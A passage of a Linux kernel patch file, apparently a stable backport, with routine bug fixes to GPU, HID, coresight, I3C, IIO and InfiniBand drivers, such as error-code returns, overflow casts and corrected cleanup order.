+@@ -9534,17 +9534,8 @@ static void cik_pcie_gen3_enable(struct radeon_device *rdev)
+ 			u16 bridge_cfg2, gpu_cfg2;
+ 			u32 max_lw, current_lw, tmp;
+ 
+-			pcie_capability_read_word(root, PCI_EXP_LNKCTL,
+-						  &bridge_cfg);
+-			pcie_capability_read_word(rdev->pdev, PCI_EXP_LNKCTL,
+-						  &gpu_cfg);
+-
+-			tmp16 = bridge_cfg | PCI_EXP_LNKCTL_HAWD;
+-			pcie_capability_write_word(root, PCI_EXP_LNKCTL, tmp16);
+-
+-			tmp16 = gpu_cfg | PCI_EXP_LNKCTL_HAWD;
+-			pcie_capability_write_word(rdev->pdev, PCI_EXP_LNKCTL,
+-						   tmp16);
++			pcie_capability_set_word(root, PCI_EXP_LNKCTL, PCI_EXP_LNKCTL_HAWD);
++			pcie_capability_set_word(rdev->pdev, PCI_EXP_LNKCTL, PCI_EXP_LNKCTL_HAWD);
+ 
+ 			tmp = RREG32_PCIE_PORT(PCIE_LC_STATUS1);
+ 			max_lw = (tmp & LC_DETECTED_LINK_WIDTH_MASK) >> LC_DETECTED_LINK_WIDTH_SHIFT;
+@@ -9591,21 +9582,14 @@ static void cik_pcie_gen3_enable(struct radeon_device *rdev)
+ 				msleep(100);
+ 
+ 				/* linkctl */
+-				pcie_capability_read_word(root, PCI_EXP_LNKCTL,
+-							  &tmp16);
+-				tmp16 &= ~PCI_EXP_LNKCTL_HAWD;
+-				tmp16 |= (bridge_cfg & PCI_EXP_LNKCTL_HAWD);
+-				pcie_capability_write_word(root, PCI_EXP_LNKCTL,
+-							   tmp16);
+-
+-				pcie_capability_read_word(rdev->pdev,
+-							  PCI_EXP_LNKCTL,
+-							  &tmp16);
+-				tmp16 &= ~PCI_EXP_LNKCTL_HAWD;
+-				tmp16 |= (gpu_cfg & PCI_EXP_LNKCTL_HAWD);
+-				pcie_capability_write_word(rdev->pdev,
+-							   PCI_EXP_LNKCTL,
+-							   tmp16);
++				pcie_capability_clear_and_set_word(root, PCI_EXP_LNKCTL,
++								   PCI_EXP_LNKCTL_HAWD,
++								   bridge_cfg &
++								   PCI_EXP_LNKCTL_HAWD);
++				pcie_capability_clear_and_set_word(rdev->pdev, PCI_EXP_LNKCTL,
++								   PCI_EXP_LNKCTL_HAWD,
++								   gpu_cfg &
++								   PCI_EXP_LNKCTL_HAWD);
+ 
+ 				/* linkctl2 */
+ 				pcie_capability_read_word(root, PCI_EXP_LNKCTL2,
+diff --git a/drivers/gpu/drm/radeon/si.c b/drivers/gpu/drm/radeon/si.c
+index 8d5e4b25609d5..a91012447b56e 100644
+--- a/drivers/gpu/drm/radeon/si.c
++++ b/drivers/gpu/drm/radeon/si.c
+@@ -7131,17 +7131,8 @@ static void si_pcie_gen3_enable(struct radeon_device *rdev)
+ 			u16 bridge_cfg2, gpu_cfg2;
+ 			u32 max_lw, current_lw, tmp;
+ 
+-			pcie_capability_read_word(root, PCI_EXP_LNKCTL,
+-						  &bridge_cfg);
+-			pcie_capability_read_word(rdev->pdev, PCI_EXP_LNKCTL,
+-						  &gpu_cfg);
+-
+-			tmp16 = bridge_cfg | PCI_EXP_LNKCTL_HAWD;
+-			pcie_capability_write_word(root, PCI_EXP_LNKCTL, tmp16);
+-
+-			tmp16 = gpu_cfg | PCI_EXP_LNKCTL_HAWD;
+-			pcie_capability_write_word(rdev->pdev, PCI_EXP_LNKCTL,
+-						   tmp16);
++			pcie_capability_set_word(root, PCI_EXP_LNKCTL, PCI_EXP_LNKCTL_HAWD);
++			pcie_capability_set_word(rdev->pdev, PCI_EXP_LNKCTL, PCI_EXP_LNKCTL_HAWD);
+ 
+ 			tmp = RREG32_PCIE(PCIE_LC_STATUS1);
+ 			max_lw = (tmp & LC_DETECTED_LINK_WIDTH_MASK) >> LC_DETECTED_LINK_WIDTH_SHIFT;
+@@ -7188,22 +7179,14 @@ static void si_pcie_gen3_enable(struct radeon_device *rdev)
+ 				msleep(100);
+ 
+ 				/* linkctl */
+-				pcie_capability_read_word(root, PCI_EXP_LNKCTL,
+-							  &tmp16);
+-				tmp16 &= ~PCI_EXP_LNKCTL_HAWD;
+-				tmp16 |= (bridge_cfg & PCI_EXP_LNKCTL_HAWD);
+-				pcie_capability_write_word(root,
+-							   PCI_EXP_LNKCTL,
+-							   tmp16);
+-
+-				pcie_capability_read_word(rdev->pdev,
+-							  PCI_EXP_LNKCTL,
+-							  &tmp16);
+-				tmp16 &= ~PCI_EXP_LNKCTL_HAWD;
+-				tmp16 |= (gpu_cfg & PCI_EXP_LNKCTL_HAWD);
+-				pcie_capability_write_word(rdev->pdev,
+-							   PCI_EXP_LNKCTL,
+-							   tmp16);
++				pcie_capability_clear_and_set_word(root, PCI_EXP_LNKCTL,
++								   PCI_EXP_LNKCTL_HAWD,
++								   bridge_cfg &
++								   PCI_EXP_LNKCTL_HAWD);
++				pcie_capability_clear_and_set_word(rdev->pdev, PCI_EXP_LNKCTL,
++								   PCI_EXP_LNKCTL_HAWD,
++								   gpu_cfg &
++								   PCI_EXP_LNKCTL_HAWD);
+ 
+ 				/* linkctl2 */
+ 				pcie_capability_read_word(root, PCI_EXP_LNKCTL2,
+diff --git a/drivers/gpu/drm/tegra/dpaux.c b/drivers/gpu/drm/tegra/dpaux.c
+index 7dc681e2ee90b..d773ef4854188 100644
+--- a/drivers/gpu/drm/tegra/dpaux.c
++++ b/drivers/gpu/drm/tegra/dpaux.c
+@@ -468,7 +468,7 @@ static int tegra_dpaux_probe(struct platform_device *pdev)
+ 
+ 	dpaux->irq = platform_get_irq(pdev, 0);
+ 	if (dpaux->irq < 0)
+-		return -ENXIO;
++		return dpaux->irq;
+ 
+ 	if (!pdev->dev.pm_domain) {
+ 		dpaux->rst = devm_reset_control_get(&pdev->dev, "dpaux");
+diff --git a/drivers/gpu/drm/tiny/repaper.c b/drivers/gpu/drm/tiny/repaper.c
+index e62f4d16b2c6b..7e2b0e2241358 100644
+--- a/drivers/gpu/drm/tiny/repaper.c
++++ b/drivers/gpu/drm/tiny/repaper.c
+@@ -533,7 +533,7 @@ static int repaper_fb_dirty(struct drm_framebuffer *fb)
+ 	DRM_DEBUG("Flushing [FB:%d] st=%ums\n", fb->base.id,
+ 		  epd->factored_stage_time);
+ 
+-	buf = kmalloc_array(fb->width, fb->height, GFP_KERNEL);
++	buf = kmalloc(fb->width * fb->height / 8, GFP_KERNEL);
+ 	if (!buf) {
+ 		ret = -ENOMEM;
+ 		goto out_exit;
+diff --git a/drivers/gpu/drm/xlnx/zynqmp_dpsub.c b/drivers/gpu/drm/xlnx/zynqmp_dpsub.c
+index 1de2d927c32b0..fcaa958d841c9 100644
+--- a/drivers/gpu/drm/xlnx/zynqmp_dpsub.c
++++ b/drivers/gpu/drm/xlnx/zynqmp_dpsub.c
+@@ -201,7 +201,9 @@ static int zynqmp_dpsub_probe(struct platform_device *pdev)
+ 	dpsub->dev = &pdev->dev;
+ 	platform_set_drvdata(pdev, dpsub);
+ 
+-	dma_set_mask(dpsub->dev, DMA_BIT_MASK(ZYNQMP_DISP_MAX_DMA_BIT));
++	ret = dma_set_mask(dpsub->dev, DMA_BIT_MASK(ZYNQMP_DISP_MAX_DMA_BIT));
++	if (ret)
++		return ret;
+ 
+ 	/* Try the reserved memory. Proceed if there's none. */
+ 	of_reserved_mem_device_init(&pdev->dev);
+diff --git a/drivers/hid/hid-input.c b/drivers/hid/hid-input.c
+index 3acaaca888acd..77ee5e01e6111 100644
+--- a/drivers/hid/hid-input.c
++++ b/drivers/hid/hid-input.c
+@@ -961,6 +961,7 @@ static void hidinput_configure_usage(struct hid_input *hidinput, struct hid_fiel
+ 			return;
+ 
+ 		case 0x3c: /* Invert */
++			device->quirks &= ~HID_QUIRK_NOINVERT;
+ 			map_key_clear(BTN_TOOL_RUBBER);
+ 			break;
+ 
+@@ -986,9 +987,13 @@ static void hidinput_configure_usage(struct hid_input *hidinput, struct hid_fiel
+ 		case 0x45: /* ERASER */
+ 			/*
+ 			 * This event is reported when eraser tip touches the surface.
+-			 * Actual eraser (BTN_TOOL_RUBBER) is set by Invert usage when
+-			 * tool gets in proximity.
++			 * Actual eraser (BTN_TOOL_RUBBER) is set and released either
++			 * by Invert if tool reports proximity or by Eraser directly.
+ 			 */
++			if (!test_bit(BTN_TOOL_RUBBER, input->keybit)) {
++				device->quirks |= HID_QUIRK_NOINVERT;
++				set_bit(BTN_TOOL_RUBBER, input->keybit);
++			}
+ 			map_key_clear(BTN_TOUCH);
+ 			break;
+ 
+@@ -1532,6 +1537,15 @@ void hidinput_hid_event(struct hid_device *hid, struct hid_field *field, struct
+ 		else if (report->tool != BTN_TOOL_RUBBER)
+ 			/* value is off, tool is not rubber, ignore */
+ 			return;
++		else if (*quirks & HID_QUIRK_NOINVERT &&
++			 !test_bit(BTN_TOUCH, input->key)) {
++			/*
++			 * There is no invert to release the tool, let hid_input
++			 * send BTN_TOUCH with scancode and release the tool after.
++			 */
++			hid_report_release_tool(report, input, BTN_TOOL_RUBBER);
++			return;
++		}
+ 
+ 		/* let hid-input set BTN_TOUCH */
+ 		break;
+diff --git a/drivers/hid/hid-logitech-dj.c b/drivers/hid/hid-logitech-dj.c
+index c358778e070bc..08768e5accedc 100644
+--- a/drivers/hid/hid-logitech-dj.c
++++ b/drivers/hid/hid-logitech-dj.c
+@@ -1285,6 +1285,9 @@ static int logi_dj_recv_switch_to_dj_mode(struct dj_receiver_dev *djrcv_dev,
+ 		 * 50 msec should gives enough time to the receiver to be ready.
+ 		 */
+ 		msleep(50);
++
++		if (retval)
++			return retval;
+ 	}
+ 
+ 	/*
+@@ -1306,7 +1309,7 @@ static int logi_dj_recv_switch_to_dj_mode(struct dj_receiver_dev *djrcv_dev,
+ 	buf[5] = 0x09;
+ 	buf[6] = 0x00;
+ 
+-	hid_hw_raw_request(hdev, REPORT_ID_HIDPP_SHORT, buf,
++	retval = hid_hw_raw_request(hdev, REPORT_ID_HIDPP_SHORT, buf,
+ 			HIDPP_REPORT_SHORT_LENGTH, HID_OUTPUT_REPORT,
+ 			HID_REQ_SET_REPORT);
+ 
+diff --git a/drivers/hid/hid-multitouch.c b/drivers/hid/hid-multitouch.c
+index e31be0cb8b850..521b2ffb42449 100644
+--- a/drivers/hid/hid-multitouch.c
++++ b/drivers/hid/hid-multitouch.c
+@@ -1594,7 +1594,6 @@ static void mt_post_parse(struct mt_device *td, struct mt_application *app)
+ static int mt_input_configured(struct hid_device *hdev, struct hid_input *hi)
+ {
+ 	struct mt_device *td = hid_get_drvdata(hdev);
+-	char *name;
+ 	const char *suffix = NULL;
+ 	struct mt_report_data *rdata;
+ 	struct mt_application *mt_application = NULL;
+@@ -1645,15 +1644,9 @@ static int mt_input_configured(struct hid_device *hdev, struct hid_input *hi)
+ 		break;
+ 	}
+ 
+-	if (suffix) {
+-		name = devm_kzalloc(&hi->input->dev,
+-				    strlen(hdev->name) + strlen(suffix) + 2,
+-				    GFP_KERNEL);
+-		if (name) {
+-			sprintf(name, "%s %s", hdev->name, suffix);
+-			hi->input->name = name;
+-		}
+-	}
++	if (suffix)
++		hi->input->name = devm_kasprintf(&hdev->dev, GFP_KERNEL,
++						 "%s %s", hdev->name, suffix);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/hid/hid-uclogic-core.c b/drivers/hid/hid-uclogic-core.c
+index bfbb51f8b5beb..39114d5c55a0e 100644
+--- a/drivers/hid/hid-uclogic-core.c
++++ b/drivers/hid/hid-uclogic-core.c
+@@ -85,10 +85,8 @@ static int uclogic_input_configured(struct hid_device *hdev,
+ {
+ 	struct uclogic_drvdata *drvdata = hid_get_drvdata(hdev);
+ 	struct uclogic_params *params = &drvdata->params;
+-	char *name;
+ 	const char *suffix = NULL;
+ 	struct hid_field *field;
+-	size_t len;
+ 	size_t i;
+ 	const struct uclogic_params_frame *frame;
+ 
+@@ -146,14 +144,9 @@ static int uclogic_input_configured(struct hid_device *hdev,
+ 		}
+ 	}
+ 
+-	if (suffix) {
+-		len = strlen(hdev->name) + 2 + strlen(suffix);
+-		name = devm_kzalloc(&hi->input->dev, len, GFP_KERNEL);
+-		if (name) {
+-			snprintf(name, len, "%s %s", hdev->name, suffix);
+-			hi->input->name = name;
+-		}
+-	}
++	if (suffix)
++		hi->input->name = devm_kasprintf(&hdev->dev, GFP_KERNEL,
++						 "%s %s", hdev->name, suffix);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/hv/vmbus_drv.c b/drivers/hv/vmbus_drv.c
+index b03cb7ae7fd38..e9c3f1e826baa 100644
+--- a/drivers/hv/vmbus_drv.c
++++ b/drivers/hv/vmbus_drv.c
+@@ -2452,7 +2452,8 @@ static int vmbus_acpi_add(struct acpi_device *device)
+ 	 * Some ancestor of the vmbus acpi device (Gen1 or Gen2
+ 	 * firmware) is the VMOD that has the mmio ranges. Get that.
+ 	 */
+-	for (ancestor = acpi_dev_parent(device); ancestor;
++	for (ancestor = acpi_dev_parent(device);
++	     ancestor && ancestor->handle != ACPI_ROOT_OBJECT;
+ 	     ancestor = acpi_dev_parent(ancestor)) {
+ 		result = acpi_walk_resources(ancestor->handle, METHOD_NAME__CRS,
+ 					     vmbus_walk_resources, NULL);
+diff --git a/drivers/hwmon/tmp513.c b/drivers/hwmon/tmp513.c
+index 7d5f7441aceb1..b9a93ee9c2364 100644
+--- a/drivers/hwmon/tmp513.c
++++ b/drivers/hwmon/tmp513.c
+@@ -434,7 +434,7 @@ static umode_t tmp51x_is_visible(const void *_data,
+ 
+ 	switch (type) {
+ 	case hwmon_temp:
+-		if (data->id == tmp512 && channel == 4)
++		if (data->id == tmp512 && channel == 3)
+ 			return 0;
+ 		switch (attr) {
+ 		case hwmon_temp_input:
+diff --git a/drivers/hwtracing/coresight/coresight-tmc-etf.c b/drivers/hwtracing/coresight/coresight-tmc-etf.c
+index 4c4cbd1f72584..3f207999377f0 100644
+--- a/drivers/hwtracing/coresight/coresight-tmc-etf.c
++++ b/drivers/hwtracing/coresight/coresight-tmc-etf.c
+@@ -428,7 +428,7 @@ static int tmc_set_etf_buffer(struct coresight_device *csdev,
+ 		return -EINVAL;
+ 
+ 	/* wrap head around to the amount of space we have */
+-	head = handle->head & ((buf->nr_pages << PAGE_SHIFT) - 1);
++	head = handle->head & (((unsigned long)buf->nr_pages << PAGE_SHIFT) - 1);
+ 
+ 	/* find the page to write to */
+ 	buf->cur = head / PAGE_SIZE;
+diff --git a/drivers/hwtracing/coresight/coresight-tmc-etr.c b/drivers/hwtracing/coresight/coresight-tmc-etr.c
+index 368f2e5a86278..1be0e5e0e80b2 100644
+--- a/drivers/hwtracing/coresight/coresight-tmc-etr.c
++++ b/drivers/hwtracing/coresight/coresight-tmc-etr.c
+@@ -45,7 +45,8 @@ struct etr_perf_buffer {
+ };
+ 
+ /* Convert the perf index to an offset within the ETR buffer */
+-#define PERF_IDX2OFF(idx, buf)	((idx) % ((buf)->nr_pages << PAGE_SHIFT))
++#define PERF_IDX2OFF(idx, buf)		\
++		((idx) % ((unsigned long)(buf)->nr_pages << PAGE_SHIFT))
+ 
+ /* Lower limit for ETR hardware buffer */
+ #define TMC_ETR_PERF_MIN_BUF_SIZE	SZ_1M
+@@ -1249,7 +1250,7 @@ alloc_etr_buf(struct tmc_drvdata *drvdata, struct perf_event *event,
+ 	 * than the size requested via sysfs.
+ 	 */
+ 	if ((nr_pages << PAGE_SHIFT) > drvdata->size) {
+-		etr_buf = tmc_alloc_etr_buf(drvdata, (nr_pages << PAGE_SHIFT),
++		etr_buf = tmc_alloc_etr_buf(drvdata, ((ssize_t)nr_pages << PAGE_SHIFT),
+ 					    0, node, NULL);
+ 		if (!IS_ERR(etr_buf))
+ 			goto done;
+diff --git a/drivers/hwtracing/coresight/coresight-tmc.h b/drivers/hwtracing/coresight/coresight-tmc.h
+index 66959557cf398..946aab12f9807 100644
+--- a/drivers/hwtracing/coresight/coresight-tmc.h
++++ b/drivers/hwtracing/coresight/coresight-tmc.h
+@@ -325,7 +325,7 @@ ssize_t tmc_sg_table_get_data(struct tmc_sg_table *sg_table,
+ static inline unsigned long
+ tmc_sg_table_buf_size(struct tmc_sg_table *sg_table)
+ {
+-	return sg_table->data_pages.nr_pages << PAGE_SHIFT;
++	return (unsigned long)sg_table->data_pages.nr_pages << PAGE_SHIFT;
+ }
+ 
+ struct coresight_device *tmc_etr_get_catu_device(struct tmc_drvdata *drvdata);
+diff --git a/drivers/hwtracing/coresight/coresight-trbe.c b/drivers/hwtracing/coresight/coresight-trbe.c
+index 1fc4fd79a1c69..925f6c9cecff4 100644
+--- a/drivers/hwtracing/coresight/coresight-trbe.c
++++ b/drivers/hwtracing/coresight/coresight-trbe.c
+@@ -1223,6 +1223,16 @@ static void arm_trbe_enable_cpu(void *info)
+ 	enable_percpu_irq(drvdata->irq, IRQ_TYPE_NONE);
+ }
+ 
++static void arm_trbe_disable_cpu(void *info)
++{
++	struct trbe_drvdata *drvdata = info;
++	struct trbe_cpudata *cpudata = this_cpu_ptr(drvdata->cpudata);
++
++	disable_percpu_irq(drvdata->irq);
++	trbe_reset_local(cpudata);
++}
++
++
+ static void arm_trbe_register_coresight_cpu(struct trbe_drvdata *drvdata, int cpu)
+ {
+ 	struct trbe_cpudata *cpudata = per_cpu_ptr(drvdata->cpudata, cpu);
+@@ -1324,18 +1334,12 @@ cpu_clear:
+ 	cpumask_clear_cpu(cpu, &drvdata->supported_cpus);
+ }
+ 
+-static void arm_trbe_remove_coresight_cpu(void *info)
++static void arm_trbe_remove_coresight_cpu(struct trbe_drvdata *drvdata, int cpu)
+ {
+-	int cpu = smp_processor_id();
+-	struct trbe_drvdata *drvdata = info;
+-	struct trbe_cpudata *cpudata = per_cpu_ptr(drvdata->cpudata, cpu);
+ 	struct coresight_device *trbe_csdev = coresight_get_percpu_sink(cpu);
+ 
+-	disable_percpu_irq(drvdata->irq);
+-	trbe_reset_local(cpudata);
+ 	if (trbe_csdev) {
+ 		coresight_unregister(trbe_csdev);
+-		cpudata->drvdata = NULL;
+ 		coresight_set_percpu_sink(cpu, NULL);
+ 	}
+ }
+@@ -1364,8 +1368,10 @@ static int arm_trbe_remove_coresight(struct trbe_drvdata *drvdata)
+ {
+ 	int cpu;
+ 
+-	for_each_cpu(cpu, &drvdata->supported_cpus)
+-		smp_call_function_single(cpu, arm_trbe_remove_coresight_cpu, drvdata, 1);
++	for_each_cpu(cpu, &drvdata->supported_cpus) {
++		smp_call_function_single(cpu, arm_trbe_disable_cpu, drvdata, 1);
++		arm_trbe_remove_coresight_cpu(drvdata, cpu);
++	}
+ 	free_percpu(drvdata->cpudata);
+ 	return 0;
+ }
+@@ -1404,12 +1410,8 @@ static int arm_trbe_cpu_teardown(unsigned int cpu, struct hlist_node *node)
+ {
+ 	struct trbe_drvdata *drvdata = hlist_entry_safe(node, struct trbe_drvdata, hotplug_node);
+ 
+-	if (cpumask_test_cpu(cpu, &drvdata->supported_cpus)) {
+-		struct trbe_cpudata *cpudata = per_cpu_ptr(drvdata->cpudata, cpu);
+-
+-		disable_percpu_irq(drvdata->irq);
+-		trbe_reset_local(cpudata);
+-	}
++	if (cpumask_test_cpu(cpu, &drvdata->supported_cpus))
++		arm_trbe_disable_cpu(drvdata);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/i2c/i2c-core-of.c b/drivers/i2c/i2c-core-of.c
+index 3ed74aa4b44bb..1073f82d5dd47 100644
+--- a/drivers/i2c/i2c-core-of.c
++++ b/drivers/i2c/i2c-core-of.c
+@@ -244,6 +244,11 @@ static int of_i2c_notify(struct notifier_block *nb, unsigned long action,
+ 			return NOTIFY_OK;
+ 		}
+ 
++		/*
++		 * Clear the flag before adding the device so that fw_devlink
++		 * doesn't skip adding consumers to this device.
++		 */
++		rd->dn->fwnode.flags &= ~FWNODE_FLAG_NOT_DEVICE;
+ 		client = of_i2c_register_device(adap, rd->dn);
+ 		if (IS_ERR(client)) {
+ 			dev_err(&adap->dev, "failed to create client for '%pOF'\n",
+diff --git a/drivers/i3c/master/svc-i3c-master.c b/drivers/i3c/master/svc-i3c-master.c
+index d47360f8a1f36..4eebf15f685a3 100644
+--- a/drivers/i3c/master/svc-i3c-master.c
++++ b/drivers/i3c/master/svc-i3c-master.c
+@@ -782,6 +782,10 @@ static int svc_i3c_master_do_daa_locked(struct svc_i3c_master *master,
+ 				 */
+ 				break;
+ 			} else if (SVC_I3C_MSTATUS_NACKED(reg)) {
++				/* No I3C devices attached */
++				if (dev_nb == 0)
++					break;
++
+ 				/*
+ 				 * A slave device nacked the address, this is
+ 				 * allowed only once, DAA will be stopped and
+@@ -1251,11 +1255,17 @@ static int svc_i3c_master_send_ccc_cmd(struct i3c_master_controller *m,
+ {
+ 	struct svc_i3c_master *master = to_svc_i3c_master(m);
+ 	bool broadcast = cmd->id < 0x80;
++	int ret;
+ 
+ 	if (broadcast)
+-		return svc_i3c_master_send_bdcast_ccc_cmd(master, cmd);
++		ret = svc_i3c_master_send_bdcast_ccc_cmd(master, cmd);
+ 	else
+-		return svc_i3c_master_send_direct_ccc_cmd(master, cmd);
++		ret = svc_i3c_master_send_direct_ccc_cmd(master, cmd);
++
++	if (ret)
++		cmd->err = I3C_ERROR_M2;
++
++	return ret;
+ }
+ 
+ static int svc_i3c_master_priv_xfers(struct i3c_dev_desc *dev,
+diff --git a/drivers/iio/accel/adxl313_i2c.c b/drivers/iio/accel/adxl313_i2c.c
+index 99cc7fc294882..68785bd3ef2f0 100644
+--- a/drivers/iio/accel/adxl313_i2c.c
++++ b/drivers/iio/accel/adxl313_i2c.c
+@@ -40,8 +40,8 @@ static const struct regmap_config adxl31x_i2c_regmap_config[] = {
+ 
+ static const struct i2c_device_id adxl313_i2c_id[] = {
+ 	{ .name = "adxl312", .driver_data = (kernel_ulong_t)&adxl31x_chip_info[ADXL312] },
+-	{ .name = "adxl313", .driver_data = (kernel_ulong_t)&adxl31x_chip_info[ADXL312] },
+-	{ .name = "adxl314", .driver_data = (kernel_ulong_t)&adxl31x_chip_info[ADXL312] },
++	{ .name = "adxl313", .driver_data = (kernel_ulong_t)&adxl31x_chip_info[ADXL313] },
++	{ .name = "adxl314", .driver_data = (kernel_ulong_t)&adxl31x_chip_info[ADXL314] },
+ 	{ }
+ };
+ 
+diff --git a/drivers/infiniband/core/uverbs_std_types_counters.c b/drivers/infiniband/core/uverbs_std_types_counters.c
+index 999da9c798668..381aa57976417 100644
+--- a/drivers/infiniband/core/uverbs_std_types_counters.c
++++ b/drivers/infiniband/core/uverbs_std_types_counters.c
+@@ -107,6 +107,8 @@ static int UVERBS_HANDLER(UVERBS_METHOD_COUNTERS_READ)(
+ 		return ret;
+ 
+ 	uattr = uverbs_attr_get(attrs, UVERBS_ATTR_READ_COUNTERS_BUFF);
++	if (IS_ERR(uattr))
++		return PTR_ERR(uattr);
+ 	read_attr.ncounters = uattr->ptr_attr.len / sizeof(u64);
+ 	read_attr.counters_buff = uverbs_zalloc(
+ 		attrs, array_size(read_attr.ncounters, sizeof(u64)));
+diff --git a/drivers/infiniband/hw/efa/efa_verbs.c b/drivers/infiniband/hw/efa/efa_verbs.c
+index f9526a4c75b26..90d5f1a96f3e5 100644
+--- a/drivers/infiniband/hw/efa/efa_verbs.c
++++ b/drivers/infiniband/hw/efa/efa_verbs.c
+@@ -443,12 +443,12 @@ int efa_destroy_qp(struct ib_qp *ibqp, struct ib_udata *udata)
+ 
+ 	ibdev_dbg(&dev->ibdev, "Destroy qp[%u]\n", ibqp->qp_num);
+ 
+-	efa_qp_user_mmap_entries_remove(qp);
+-
+ 	err = efa_destroy_qp_handle(dev, qp->qp_handle);
+ 	if (err)
+ 		return err;
+ 
++	efa_qp_user_mmap_entries_remove(qp);
++
+ 	if (qp->rq_cpu_addr) {
+ 		ibdev_dbg(&dev->ibdev,
+ 			  "qp->cpu_addr[0x%p] freed: size[%lu], dma[%pad]\n",
+@@ -1007,8 +1007,8 @@ int efa_destroy_cq(struct ib_cq *ibcq, struct ib_udata *udata)
+ 		  "Destroy cq[%d] virt[0x%p] freed: size[%lu], dma[%pad]\n",
+ 		  cq->cq_idx, cq->cpu_addr, cq->size, &cq->dma_addr);
+ 
+-	efa_cq_user_mmap_entries_remove(cq);
+ 	efa_destroy_cq_idx(dev, cq->cq_idx);
++	efa_cq_user_mmap_entries_remove(cq);
+ 	if (cq->eq) {
+ 		xa_erase(&dev->cqs_xa, cq->cq_idx);
+ 		synchronize_irq(cq->eq->irq.irqn);
+diff --git a/drivers/infiniband/hw/hns/hns_roce_device.h b/drivers/infiniband/hw/hns/hns_roce_device.h
+index f701cc86896b3..1112afa0af552 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_device.h
++++ b/drivers/infiniband/hw/hns/hns_roce_device.h
+@@ -97,6 +97,7 @@
+ #define HNS_ROCE_CQ_BANK_NUM 4
+ 
+ #define CQ_BANKID_SHIFT 2
++#define CQ_BANKID_MASK GENMASK(1, 0)
+ 
+ enum {
+ 	SERV_TYPE_RC,
+diff --git a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+index 34a270b6891a9..33980485ef5ba 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
++++ b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+@@ -757,7 +757,8 @@ out:
+ 		qp->sq.head += nreq;
+ 		qp->next_sge = sge_idx;
+ 
+-		if (nreq == 1 && (qp->en_flags & HNS_ROCE_QP_CAP_DIRECT_WQE))
++		if (nreq == 1 && !ret &&
++		    (qp->en_flags & HNS_ROCE_QP_CAP_DIRECT_WQE))
+ 			write_dwqe(hr_dev, qp, wqe);
+ 		else
+ 			update_sq_db(hr_dev, qp);
+@@ -6864,14 +6865,14 @@ static int __hns_roce_hw_v2_init_instance(struct hnae3_handle *handle)
+ 	ret = hns_roce_init(hr_dev);
+ 	if (ret) {
+ 		dev_err(hr_dev->dev, "RoCE Engine init failed!\n");
+-		goto error_failed_cfg;
++		goto error_failed_roce_init;
+ 	}
+ 
+ 	if (hr_dev->pci_dev->revision == PCI_REVISION_ID_HIP08) {
+ 		ret = free_mr_init(hr_dev);
+ 		if (ret) {
+ 			dev_err(hr_dev->dev, "failed to init free mr!\n");
+-			goto error_failed_roce_init;
++			goto error_failed_free_mr_init;
+ 		}
+ 	}
+ 
+@@ -6879,10 +6880,10 @@ static int __hns_roce_hw_v2_init_instance(struct hnae3_handle *handle)
+ 
+ 	return 0;
+ 
+-error_failed_roce_init:
++error_failed_free_mr_init:
+ 	hns_roce_exit(hr_dev);
+ 
+-error_failed_cfg:
++error_failed_roce_init:
+ 	kfree(hr_dev->priv);
+ 
+ error_failed_kzalloc:
+diff --git a/drivers/infiniband/hw/hns/hns_roce_main.c b/drivers/infiniband/hw/hns/hns_roce_main.c
+index 946ba1109e878..da1b33d818d82 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_main.c
++++ b/drivers/infiniband/hw/hns/hns_roce_main.c
+@@ -219,6 +219,7 @@ static int hns_roce_query_port(struct ib_device *ib_dev, u32 port_num,
+ 	unsigned long flags;
+ 	enum ib_mtu mtu;
+ 	u32 port;
++	int ret;
+ 
+ 	port = port_num - 1;
+ 
+@@ -231,8 +232,10 @@ static int hns_roce_query_port(struct ib_device *ib_dev, u32 port_num,
+ 				IB_PORT_BOOT_MGMT_SUP;
+ 	props->max_msg_sz = HNS_ROCE_MAX_MSG_LEN;
+ 	props->pkey_tbl_len = 1;
+-	props->active_width = IB_WIDTH_4X;
+-	props->active_speed = 1;
++	ret = ib_get_eth_speed(ib_dev, port_num, &props->active_speed,
++			       &props->active_width);
++	if (ret)
++		ibdev_warn(ib_dev, "failed to get speed, ret = %d.\n", ret);
+ 
+ 	spin_lock_irqsave(&hr_dev->iboe.lock, flags);
+ 
+diff --git a/drivers/infiniband/hw/hns/hns_roce_qp.c b/drivers/infiniband/hw/hns/hns_roce_qp.c
+index 0ae335fb205ca..7a95f8677a02c 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_qp.c
++++ b/drivers/infiniband/hw/hns/hns_roce_qp.c
+@@ -170,14 +170,29 @@ static void hns_roce_ib_qp_event(struct hns_roce_qp *hr_qp,
+ 	}
+ }
+ 
+-static u8 get_least_load_bankid_for_qp(struct hns_roce_bank *bank)
++static u8 get_affinity_cq_bank(u8 qp_bank)
+ {
+-	u32 least_load = bank[0].inuse;
++	return (qp_bank >> 1) & CQ_BANKID_MASK;
++}
++
++static u8 get_least_load_bankid_for_qp(struct ib_qp_init_attr *init_attr,
++					struct hns_roce_bank *bank)
++{
++#define INVALID_LOAD_QPNUM 0xFFFFFFFF
++	struct ib_cq *scq = init_attr->send_cq;
++	u32 least_load = INVALID_LOAD_QPNUM;
++	unsigned long cqn = 0;
+ 	u8 bankid = 0;
+ 	u32 bankcnt;
+ 	u8 i;
+ 
+-	for (i = 1; i < HNS_ROCE_QP_BANK_NUM; i++) {
++	if (scq)
++		cqn = to_hr_cq(scq)->cqn;
++
++	for (i = 0; i < HNS_ROCE_QP_BANK_NUM; i++) {
++		if (scq && (get_affinity_cq_bank(i) != (cqn & CQ_BANKID_MASK)))
++			continue;
++
+ 		bankcnt = bank[i].inuse;
+ 		if (bankcnt < least_load) {
+ 			least_load = bankcnt;
+@@ -209,7 +224,8 @@ static int alloc_qpn_with_bankid(struct hns_roce_bank *bank, u8 bankid,
+ 
+ 	return 0;
+ }
+-static int alloc_qpn(struct hns_roce_dev *hr_dev, struct hns_roce_qp *hr_qp)
++static int alloc_qpn(struct hns_roce_dev *hr_dev, struct hns_roce_qp *hr_qp,
++		     struct ib_qp_init_attr *init_attr)
+ {
+ 	struct hns_roce_qp_table *qp_table = &hr_dev->qp_table;
